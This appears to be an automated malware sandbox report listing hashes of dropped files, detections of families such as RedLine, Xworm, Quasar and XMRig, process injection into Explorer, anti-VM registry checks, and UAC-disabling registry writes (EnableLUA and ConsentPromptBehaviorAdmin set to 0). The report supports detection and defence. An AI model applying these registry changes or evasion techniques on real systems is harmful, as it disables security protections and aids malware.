C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe
| MD5 | 78c586522f986994aa77c466c9d678a8 |
| SHA1 | 4b9b13c3782ae532a140a33ba673dc65a37aa882 |
| SHA256 | 498ac6b747691eb456fc24ac26c3932effca9b46e39740963120f711e72aefc9 |
| SHA512 | 707ff5fcbb5e473583bec2d54aac25a3febe262c06025c9d88ddd5d30449b1454289eaa63bec848ca69147232474731052bef710e60c042d0c80e9c02486b5bb |
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
| MD5 | 015a5ef479c8d3e296e6a99e0fa7df6a |
| SHA1 | 69f188973fdc12d282e490041d18b01c0d49752d |
| SHA256 | c73ff8630476795ba4dde19e7763d1aae50978b0b9b029cd71828a2da3c2197c |
| SHA512 | 4c692aaff1607cf402ed7acc2f91f587229bfface6f75ae8329e031d69437f43291b186e9ca4bcdea595145ea50f3e23d064306e9a8d83a8848cf9096146e46a |
C:\Users\Admin\AppData\Local\Temp\a\laz.exe
| MD5 | 0a3457f3fb0d5c837200b2849e85b206 |
| SHA1 | 851c4add14eabb3b549666d2494ddcc4ebaf40b9 |
| SHA256 | aaeb0f22d9625f23135bc86f9ed7d5a877153732b9f24d3e416fe9fc7e532080 |
| SHA512 | 9610c9e53770f451b9d686d39b4475fed85ef443db663d1a4945aca19f940a9f24cda9907fabecb27304e5b4f52c8b13cf00d8385e55a1edbb3eebaf78ab7cbd |
C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
| MD5 | e9fb13875b744fa633d1a7a34b0f6a52 |
| SHA1 | f0966985745541ba01800aa213509a89a7fdf716 |
| SHA256 | fb8fb89b5f56ce2acd9668021a470a18b7898808750800861151e908d5b1a20e |
| SHA512 | c2feda22e23fda47f0b0ede38f5f432a656a5e7598c7a9d3d4e8babf9ff94189b69f4f4a3894c094260c3b72d21888720f60ed7ee2c018c8aced9d754e03e292 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | f25e48e1d9e1e1398bc5fbc6885570b8 |
| SHA1 | 46557c8ebb9236af6c28c9bdd317d1d25749e710 |
| SHA256 | 0379e6a5dff30a991e0acdb9932cac828eb3e30ca8cc23447a2bc73ae78181db |
| SHA512 | 41e61480f5141b6950d7b96f3e4dfcca19bc480e0b11eeebdedaeb266c6e525f41f3d29a3c1c0bf8f17a3c30111d8fba7e269d5fcf84b336bee916e21881acb7 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | c2eb31234fe828d47909a1f60d569f52 |
| SHA1 | 980e0eb574e9474c14df00219eb3c4ce37cb8b6d |
| SHA256 | 4a35f6b787eedb2a6eb70b5f312e4d372d380f8faab0e5feee6eaa65784b3e94 |
| SHA512 | 0a0ca77a15c980fbfc2168cea46d29939ba016c4aa1f8e0485c20dcc14b3609ff44331942f9ee193eb6e84c8b9854c1a12ad76becaabbb9921b0a9968a09cf42 |
C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe
| MD5 | ab3f75f41982ca216badc3e56f9d3e88 |
| SHA1 | ee26477ee9d90af2e940e6f99617e7d54b241635 |
| SHA256 | e47e8c01326ac9c785f3edcd04fb360333a5904854c69d464f8321a27f5d0c08 |
| SHA512 | 6325f73f6d82424aaa64132fb37b0c7713fc53faa304da8d63a71c757cfd4dcdccac925650bf763188d913c9562e37f2a500ad7bb80d7b9f6aa456c43bfe8822 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | fcdf1962a9323eaea99ed4f72775093e |
| SHA1 | 277f044d4ab9a5ba6b8f8ee4a7c0e3880f6c53f2 |
| SHA256 | 28cfeccffb6bcec816783f0205cfdd71517b275c8e595b2ec5e988628499955b |
| SHA512 | f39fc7265c5d2ae78956f1352419477cbdd5bc80cfbded6777393cc5351276ac081b23c96f23c4fe6e1910915053829fa18e122bb97eba3667d46b52084769a4 |
C:\Users\Admin\AppData\Local\Temp\a\gcapi.dll
| MD5 | 1ce7d5a1566c8c449d0f6772a8c27900 |
| SHA1 | 60854185f6338e1bfc7497fd41aa44c5c00d8f85 |
| SHA256 | 73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf |
| SHA512 | 7e3411be8614170ae91db1626c452997dc6db663d79130872a124af982ee1d457cefba00abd7f5269adce3052403be31238aecc3934c7379d224cb792d519753 |
C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe
| MD5 | 0c1a360f7ca0e6289d8403f1ebfa4690 |
| SHA1 | 891483904f22cf6495bd310c4bf7c05fc42b85ba |
| SHA256 | 2d1a3f0c2f05f3d0ee2c4c4d49abd370b0a9e9c811a98c07f8d06c368d46dffe |
| SHA512 | f10cd6843b457e1abb0b43ec716c23e8a093dd46750ea1f378e90108f28fa6c7a02d1b9227b7b9dcf9d2e8de6489cf9f6d1d24381d2aea55e6b9dd3fba55a118 |
C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe
| MD5 | c566295ef2f48b51a4932af0aa993e48 |
| SHA1 | 0b69f71e7f624a8b5f4b502fde9de972a94543ff |
| SHA256 | f096fd252e752b20a37c8963bb0ef947e7a7a1794552db8b5642523db9357d8f |
| SHA512 | d51b8893ce58395dbd03441e59ca367d94a346e4241925db84b88f57209c98ebdc1513942606a4e469bf622968a10f03ce7b10f314d0ddc061675d46f34c8a3c |
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
| MD5 | 3f44dd7f287da4a9a1be82e5178b7dc8 |
| SHA1 | 996fcf7b6c0a5ed217a46b013c067e0c1fe3eba9 |
| SHA256 | e8000766c215b2df493c0aa0d8fa29fae04b1d0730ad1e7d7626484dc9d7b225 |
| SHA512 | 1d6b602bf9b3680d14c3c18d69c2ac446ad2c204fca23da6300b250a2907e24cf14604dc7d6c2649422071169de71d9fc47308bfbbb7304b87d8d238aa419d03 |
C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe
| MD5 | 2ca5f321b0683c4cdd64c2ab7761c2db |
| SHA1 | 1af4717e30ee791aa16c88f5d319bc949bdec2d5 |
| SHA256 | b19d81651cf60b9a4344f531832e7421a38ab29eaa3946de230ca72e849aa4e4 |
| SHA512 | a3f75cf31b96f480ada63a1550fbfad92daf14944e32d142afe35494058f07ce846224aef47dea7ce9da45be5e2008b0b4650e0e12d207842e83b0c6d9be89ff |
C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe
| MD5 | 8b712dbac428c4107c3c44f92743d8e6 |
| SHA1 | 65027334951d9be6149627fef6a45f2397cfe747 |
| SHA256 | fd1eb7d83a9f704ba4f4ebea145dca07de27d78d622c24b506c9fd0f7dc090f3 |
| SHA512 | e162e242fff25aaa8192ce69a5749fa2f6919a3413c158f40b4eb383a24088c7aa321b3286d97723a960a3e9406db8747d752725f981e9c903bada8f1524d22e |
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
| MD5 | d25c3bd6c96b1d4b95f492a9daa4a6a1 |
| SHA1 | 9b4f388fec4511ce3fa5bf855626c7c7b517ac21 |
| SHA256 | fa0f2e683c50d4908381e6ef16edcec29cc3f1d225b63de58f83d1c9bd854ff9 |
| SHA512 | 75d26dc48a6446e3bf47c45edd3697d52332106a400f34b4ca7af588e226f5f5563a13156568582b6e5a97edd8f1cf60d1ede7dcb9d5aca9f41eec628a7e041a |
C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe
| MD5 | ac1997ffe0c45d75cec0f1bbfe24cd62 |
| SHA1 | 67f28f8d9ff0a2f3a6d84948f541b204339a26e4 |
| SHA256 | 63424ba4e2e4c05fd5f7592d93d611a426c2bfb80f9989ecfd6b34613004614a |
| SHA512 | 527856bfb0c7cdd390dd4e868ca9137b27cd1c46c4450f061db7e1d9483403e96dbad56127fb8b186b8a3f3a5b363036e0809e9de8a9973fd89d3a79c1d52144 |
C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe
| MD5 | 6304ce36f17952d70bceb540d4b916ac |
| SHA1 | 737d2ecf8f514e85c2776416100eefb5ea23391c |
| SHA256 | 6b0bd6af17d546a941450c6463e3c704810b78910a6f6b31feca4e8a4200db78 |
| SHA512 | 60674f266829fd74b8d15867193ebbbed77633fe89eee3824ab15d9bc563e684e4f1b3bd2ac34b03d527554f6a4bce7a16fe27c48e06ad5c0e25e3a7e9c8c78e |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 25e71767a94343d45dd3e066c05784bf |
| SHA1 | 901ae90156458e9b91f29cb0789964a5bfbc1127 |
| SHA256 | 1b7467f3f2b0a63dc29701aa97c9e7b76757e4aa6c44d61e48e067068ca88525 |
| SHA512 | ae538706623ced39a44622e9fd0f0422c4824bf9e8cc2ef6b143458873d142230ad949efeb8651fdba70f9488be935ace6bf40a8da842d74ca7895c85abb4bd6 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 4f559d9257cbacf85aaeb62f530c70cd |
| SHA1 | 23c369aeb9a8f6e8c036291a159bfa94b7595f91 |
| SHA256 | 863f86c0cd7c7451faa39ac7d9de56522eae32ba652d1d31d48743295eead598 |
| SHA512 | 5d92dab2df65e54a3ba445682479f01bd1e620fdcd99b4420ef9fcd0382363004ab439a481e0d6ba79b6831fe899956a611738305fa04fdf18111bae6efe1389 |
C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe
| MD5 | 8e0d340e723ce188de651b8ffb887d81 |
| SHA1 | cb90a07f1a4ffae68cca6281325606009d3d7266 |
| SHA256 | 514c0d56b0b5ea74a2729c99adcc92cd4b51795498281c1675636bb5b9d17cb7 |
| SHA512 | d5505ef82f69085b975312255bb733f66a97850ecb6608000ba642ec7d2997a88a184d230c38acfe01a9d33adf0b46b88a59d4b97bf11ae9a45b7b9c7e2904e1 |
C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe
| MD5 | d9694a6a1989d79aeded3f93cb97d24e |
| SHA1 | a18019b9793029dac4d10e619ec85ea26909336a |
| SHA256 | 772c7a131d2a7a239ec39f32214eb94113aacd3984f572fb7e3b1fa1bec98f8c |
| SHA512 | 35a29c81d72f0e0bdb169c400dc90bf85859313c250824bf1fbbe362903c63f6a826e94994f8d86e8f56def5ce34cc71a45c6ff936e85fcfe8d169dbdb118168 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 97d9059805b59a38cef6036e01ac9056 |
| SHA1 | 40429fc8a0d83c6f06f35597e86cc27ef34e1603 |
| SHA256 | 4cef3a4802bc4cdbde24e0870022c2914608d7bdcc268cf0e1b7d99ec3a0ddbc |
| SHA512 | eaf8b96acc2e66ba07c5881de8d2f1d853f9191c494dc436425a297390fd5239fd48ce1dd7cfde0393237dc1811f52822405b5f397cfc15a98f763c04d233041 |
C:\Users\Admin\AppData\Local\Temp\a\srtware.exe
| MD5 | e364a1bd0e0be70100779ff5389a78da |
| SHA1 | dd8269db6032720dbac028931e28a6588fca7bae |
| SHA256 | 7c8798ab738b8648a5faa9d157c0711be645fabf49c355a77477fb8da5df360e |
| SHA512 | ff2ebfe652cdace05243df45100d5f8e306f65a128ec0b5395d1cc7be429e1b4090f744860963ef9996f74bccee134f198e9a6b0ff14383a404c6e4c9e6ef338 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 00492073968f429aa15f846b05734abd |
| SHA1 | 10c780c8823c596b573920a9512669f835b0a4cd |
| SHA256 | e1d9080aefbe65664c44397a1f32ff65fd9d7d2c3be70b798b96eb5996dd89d9 |
| SHA512 | 27f2940415119814410ce466acee0c98e04f4ddccac2532f9cb2db97916c5f0187c8c759649e91fd2373e85da6a9b89ccd9d5486a5741528ff9a853ac26116f8 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 4632db03390d946c7203ab740ed675ae |
| SHA1 | dd1bf137dfc473f27812141d26c7637a5f52762f |
| SHA256 | 1137936891f91d3564d2f2a12c35f551c8dc5036c914a3610f111e550852a5c8 |
| SHA512 | cdded7ac54483b1bebc7ff7505f7d0381f1b1a97648b8e963b0084f33a465084d1e1b3213428a8d9726bb68027b6fbeface3eecb1941c93cd6dc7620b3c9446a |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 4b7c630cdf106dbb92bf5956e18d6ea0 |
| SHA1 | df632a9931de7360b9b9c14c1c95db83daf45b1a |
| SHA256 | e3036170507bfd31fd5a734f7d3b2cb10e980f89bb1962361d6ab786d23431c9 |
| SHA512 | 4f076d2a0d109c53911b7fd856f144dafa2a0ec02611de4fc57584a5f458155809cf9243f8939640a1e4e1e02163838ea65c338e5d5632eff7b13bc8589f5585 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | c38812c636e3c0b5b94e15c135a736c0 |
| SHA1 | 3e3a3b0ec09b34521282ada8439730662af5d6d8 |
| SHA256 | 23f7ff585409734df1bfb29d9101bc6a8ec44a41079eebf699e568c4c10cdd36 |
| SHA512 | 5baf8d3ba715c089fe326bdd0f11c9aa62c88a7194db5ea4809780fe69c3d09b70cde2f4f8a473134692ef4b342bd3d18ea5e3c04eb51b4694e8f8b6b152940c |
C:\ProgramData\AnyDesk\service.conf
| MD5 | 1571ac8abb5f7e94d16cda9a61f69a62 |
| SHA1 | 7537508c386ccde8da472d1aa3403d8583020123 |
| SHA256 | 141d1c772553ba42dd4cb21ed07f00bfa1db06bc19432603af5a678c5f86166b |
| SHA512 | a596f2b979bb3365358bd46dd9bd69f58c73a25186de690402bba436d7128896d0b5f4e7713d9f31b95e385b411a6ecb166fe997900e1a7ce6b7cd7319956965 |
C:\ProgramData\AnyDesk\service.conf
| MD5 | 83fab3de835e536b54070485ee73b11a |
| SHA1 | 532ea4d404622556ebf1a7c3fd061cb42163f49a |
| SHA256 | f778ecbcd94e28a5eb3eae07a1330b2b7c1a3b61241f8deb41ab71e825497504 |
| SHA512 | 64873890c80c47398d658ae85acf8cba737ba425fff706a673fa21e36feced3b8e53c9fbb56e3b91c97e5f5faf7fab46b67c2c119c632ebb21271cd9574e3e61 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 4e24eeda3d3f9adb95ed2a2786b88fdf |
| SHA1 | 29d45ae55f61634bd3c3576bfac97c15f53b62e7 |
| SHA256 | c58e3c7b3c28fc414459e62cff0952a948e9e7911e1f2cc913f3523bc9599e62 |
| SHA512 | 8535aa7639e730832da0d48862d0816cfdcd04da60a8c7343c8413e22b4270b9e2e06c23d2539585a3d172fe1e5a116f2c37a4818a020e646cfac00242aa68f7 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | fed60826e671b7f25af145e3f15e24b4 |
| SHA1 | 850c792730c135de028447308d5d541812d5ddc3 |
| SHA256 | 3deb748ddd3314d4e4b1ea473fc3ca365e1915dd577da1d4de1cdaf9664fa105 |
| SHA512 | 54abd1caec3fb2dc31c602fa5bd83a182fa2274091f94ae5b562f12fd0cd41ff940926c045392b59a7e89fded056e3871f18df2cb7a01df501733ccada27303c |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 005c56c45b84451f00829acaced6dc62 |
| SHA1 | a595402d1cf107065fb8a49ebb4e3af2951ba4c8 |
| SHA256 | 5eeb209d98540e9af832980e42dbcfc7c75e6cca547434f10e7b8d8a51954cbb |
| SHA512 | fe3b3736e2842620ae7eab762121a7920fa85bd7b9bf9b7b33012ed5cb1e5a44b07f451a8db37ad75ea05dd50ea91533b275e9321a24ff933e2ad4854b447914 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 4b84a7cdce3c507cffc83c37b5120db6 |
| SHA1 | 19c97c0f82a714baeb51afbe241e402352a8c743 |
| SHA256 | aaec0a4771c3203014eb4ba03c1668e00bbd2558b37505976357d2ceaed81507 |
| SHA512 | ee2f7442c431c7021c90e23fe1e3ac67f61456b7e81997f1a7d6f3d4d9b0d71dd7f73bf52c57fec12ecffe3880c957213aec15ef40c66994987dffa4e5382fb4 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 689c4334d3e224061d056d8d1f829683 |
| SHA1 | 65fdb8873fb74f9c026d5e85e7b391caa5b2627a |
| SHA256 | 492634f9770eb72f42e9a91d57b052316e04267ea53a58786be2881778b1dcf6 |
| SHA512 | 55aadb74421812140235655010078297398a2de736a8cc65b13ee08909b538152fa48a961040868a9726c36e57b834732f8ba7dc4b8aa17d8ac4716a0f7dcbb0 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | cd20b228ff83b5c360c02570358dedd8 |
| SHA1 | 30f747170dc40f1e4fc5d5c65973e73a800d500b |
| SHA256 | a93a23ba5d5c8d008d9b9e16f668517a93f33cb5296b5e897197e095280e7d34 |
| SHA512 | 6c7b4ac7f6abfe5f5a78c7ba9bc4bd233b554fbc8a69db4f4a11b3d37265cd4ab44304df88357fb64ab0db1304f223f62ef9941b5d9e98cadb64c66da46ab168 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 5f62d3b47af32ec5f9cc5823dfef4215 |
| SHA1 | c4ca9f9073a2aa89f0276b28fa7e2bfe14f7d694 |
| SHA256 | 2b137e654c82d3866ca9c2ca7083a8a234b107d6250b932a41de07853a05ec1b |
| SHA512 | 102a558809d3d109dc55a276ccb353ba8cedb19373b78ef0a22900f7c0d3ff061f13037238931fe909f4f2be017e07e4788a307a3acbc8d683f10631ca86ce87 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | bb6b202ab1606ca947990f09307d7423 |
| SHA1 | 009752509f0d5c75fc9a9cd3f23ffcbfd6c89690 |
| SHA256 | 9787480d2f8740d430cd8ef805471221c63ccf722df6e7ec5a76838cba0ccbe6 |
| SHA512 | 4224f6eaa0239cf0922f68a000ae9300feb1cf7facdb3551c32242b3285d7d2463f11c60c00a14d03258d3747dc90b325352e545c5d1d03257f5a5ffecadb7dc |
C:\ProgramData\AnyDesk\system.conf
| MD5 | f2f2e871f0e5c47c1dfd36e53b0b687d |
| SHA1 | ec4dbb3c4f7d4c36c8084cd1c7f250a58bf3a1a6 |
| SHA256 | 75af50fdae482ce053b08db23163d252906104c8d1bdaca0f58774c17d4f6b11 |
| SHA512 | d96579f87126b04ef0d675e16eab682bb582590fb11f12dda432eb391a187ed2c835d449adef35d55a796d2c23e361823061504f63b7085dd96e5217af7e461b |
C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe
| MD5 | 2d0600fe2b1b3bdc45d833ca32a37fdb |
| SHA1 | e9a7411bfef54050de3b485833556f84cabd6e41 |
| SHA256 | effdea83c6b7a1dc2ce9e9d40e91dfd59bed9fcbd580903423648b7ca97d9696 |
| SHA512 | 9891cd6d2140c3a5c20d5c2d6600f3655df437b99b09ae0f9daf1983190dc73385cc87f02508997bb696ac921eee43fccdf1dc210cc602938807bdb062ce1703 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\DenyRegister.csv
| MD5 | 6ad68fcedea3ac5903538f152122de14 |
| SHA1 | cc03629c7b216e7465d490f955d221e82330ce91 |
| SHA256 | c4e755a615e8f4423afe36936df6d1010bd9629e2b37c411ca1bd2cd02ff7411 |
| SHA512 | 675082dab06f2a8fe30414d522c4ce6673a190dd7b69f9d2d4bf07678b6a819b9d22b92c09f2b53b8f1d14fda8f095b7d7f92d0de0e3337d9248c89188beb458 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\WaitResume.docx
| MD5 | 1129044bf9629b34cd5fd01a1ed5a6ad |
| SHA1 | 61999fb56b01cd4dd6c254c07019762ef99f4557 |
| SHA256 | e5238dd5843917f34d4fde78b54b5a38feb1a41ce518818f4c003e486edc4f8d |
| SHA512 | 715ee50f11544de57ae79d67350d8fe701505d19d856c26b37596c48db21f5d643f1f9347492b2535e40e7b29eba6add66b0d2ccfa7a48df3a2e8f7a88f43c6e |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\PublishBackup.docx
| MD5 | 8f5bf952ca67c2f7357e97e2585a2cd1 |
| SHA1 | dea1f5d43ab0ae53a33b6d814ae812a514259add |
| SHA256 | 134158bbc6a3769e6f7cd31e3134f6e1af78e4e413a26c39ce695497e016ea28 |
| SHA512 | 18c4716300628a12ae949e63090da4f8661fc6c70a931f50bcb5e238f2b8f7dda3b5711efaded1b32d660b81ef3456a038e5bbe7baf04bae046363f668799cb1 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\MountOpen.docx
| MD5 | ed983cffe1754ca63b3e7d7773b97a96 |
| SHA1 | c4caf2aa596eef333c3bc7617e2c0353799ffd2a |
| SHA256 | 261737670e35373f4e4f6e1edf14252ee35d46ef52ad126ececd601606d8bfb5 |
| SHA512 | 00228cd96f2017c37fe6ff4614dd138647a1e71c0b56fe4e2f1555cf7e0ee864963724a34d394e873214f2ac3140307557b5e584c876eb2662dd930d2f6b7c46 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | 9ca76314f444aade766954f10e3ede9a |
| SHA1 | 9f21b0e60014d9194747c9f984dd7963f4f32601 |
| SHA256 | 0b97e881e49945e6316aaaa94d4abf7ee08e31beb72946ae64de90471196c0ad |
| SHA512 | 67215a7f64bc5d6fe617c0eca79944fa156b54af5329a1e0e3c36db94ee45d9539ad9918440919cc86021a0d4b24d612bf5732bc207f187a5a8c9b436dec3401 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | c1bede31ffcd226a9c02ba016f01352d |
| SHA1 | e99640d2868fccba6af7b6bafa00a8d10b9ae1b0 |
| SHA256 | 4c63f319b42027c146bd3db011d3571cd7d9fe8f1684752183c7d22a4ef16cf5 |
| SHA512 | dfd5bac4cc34ccd05734346bc6a04a9a193f537498b5f4601ab2fb3e20d5c159453f8e09ab9b1ca88207a0c3673e0bad28dc3651505b4dcab5c7045faf52e458 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | 69d032dc127adf8f738389483d711e9e |
| SHA1 | 6d17b1dbb9eb16572cec4ee9888c45ba1167cf77 |
| SHA256 | 4308bb8485a1b5cb1d105080d3d986e03653fcc70b5ed82048b7c62aea875d3f |
| SHA512 | 29e23842dce5b3a8e48a2acb74d57adb364476bf08fda0393c30d38749fff6916021f9ee5a731673954fe027f51c4cc81991fb8d5f4b6d9148fb9783ef87f065 |
C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe
| MD5 | ff7e78da9c8e580229fe95dfdfe5b098 |
| SHA1 | ab968e47e463f29426116753b0ca086fd5b33cdb |
| SHA256 | cefa40083339d42320bc1f9ba33c578b8abe47e15eb0dd6b0ba2f734aa8f3d6d |
| SHA512 | 45517b8bc96613daeabb738a42188b8ef19b0ac2b53e3202f7d86f683dacdbe1c4a78414938ab5ad0b48b7c546bc89a78932e3b8a1dbf6604e59b4887de48409 |
C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe
| MD5 | d6b16370cd4e60185aa88607316a0c05 |
| SHA1 | 7fbc63b1203617c67e5491745beaedb424baed78 |
| SHA256 | a6d6d1c8299f97f966d72373e999b5a8e6768914e27d5533307cf6878b95dce2 |
| SHA512 | 16c468948e568343ab1a1460d82b4c5859d09043e3a0115aa9c0aefeabfa22c796cca505ede8b1f194764dda7c5263979230e3fa272ee1fb3b21919202b01906 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-12 18:20
Reported
2024-12-12 18:40
Platform
win10v2004-20241007-en
Max time kernel
355s
Max time network
1201s
Command Line
Signatures
Azorult
Azorult family
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Discord RAT
Discordrat family
Gurcu family
Gurcu, WhiteSnake
Lumma Stealer, LummaC
Lumma family
Phorphiex family
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Remcos
Remcos family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1528 created 3440 | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe | C:\Windows\Explorer.EXE |
| PID 3728 created 3440 | N/A | C:\Users\Admin\Desktop\Files\Mswgoudnv.exe | C:\Windows\Explorer.EXE |
| PID 5060 created 3440 | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe | C:\Windows\Explorer.EXE |
| PID 6332 created 3440 | N/A | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | C:\Windows\Explorer.EXE |
| PID 2056 created 3440 | N/A | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | C:\Windows\Explorer.EXE |
| PID 680 created 3440 | N/A | C:\ProgramData\gnabpgw\wohcj.exe | C:\Windows\Explorer.EXE |
| PID 8248 created 3440 | N/A | C:\ProgramData\gnabpgw\wohcj.exe | C:\Windows\Explorer.EXE |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\system32\reg.exe | N/A |
Umbral
Umbral family
Xmrig family
Xworm
Xworm family
xmrig
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates VirtualBox registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF | C:\Users\Admin\Desktop\Files\random.exe | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
